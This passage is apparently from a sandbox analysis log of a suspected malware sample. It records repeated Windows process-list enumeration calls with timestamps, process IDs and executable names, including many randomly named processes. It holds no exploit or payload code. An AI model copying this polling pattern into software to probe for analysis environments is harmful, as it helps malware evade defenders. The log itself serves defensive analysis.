hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0105.409] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, 
cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0105.410] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0105.411] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0105.450] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0105.451] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0105.452] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0105.453] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0105.453] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, 
th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0105.454] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0105.455] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0105.456] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0105.457] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0105.458] CloseHandle (hObject=0xc4) returned 1 [0105.459] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0105.463] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0105.464] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 
[0105.465] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0105.472] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0105.473] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0105.473] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0105.474] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0105.475] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0105.475] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0105.476] 
Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0105.476] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0105.477] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0105.478] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0105.479] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0105.479] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2e, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0105.480] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0105.481] 
Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0105.482] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0105.482] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0105.483] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0105.485] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0105.486] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0105.487] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0105.488] 
Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0105.531] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0105.532] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0105.533] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0105.534] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0105.535] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0105.537] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, 
szExeFile="xplivecam.exe")) returned 1 [0105.538] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0105.539] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0105.540] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0105.541] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0105.543] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0105.544] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0105.545] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, 
dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0105.546] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0105.547] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0105.548] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0105.549] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0105.550] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0105.551] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0105.552] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, 
th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0105.553] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0105.554] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0105.555] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0105.556] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0105.557] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xba4, pcPriClassBase=8, dwFlags=0x0, szExeFile="LSfkRHur.exe")) returned 1 [0105.558] CloseHandle (hObject=0xbc) returned 1 [0105.558] Sleep (dwMilliseconds=0x12c) [0105.886] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0105.891] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0105.892] 
Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0105.892] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0105.893] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0105.894] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0105.895] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0105.895] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0105.896] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0105.897] Process32NextW (in: 
hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0105.897] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0105.898] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0105.899] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0105.899] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0105.900] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0105.901] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2e, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0105.901] Process32NextW (in: 
hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0105.902] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0105.903] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0105.903] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0105.904] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, 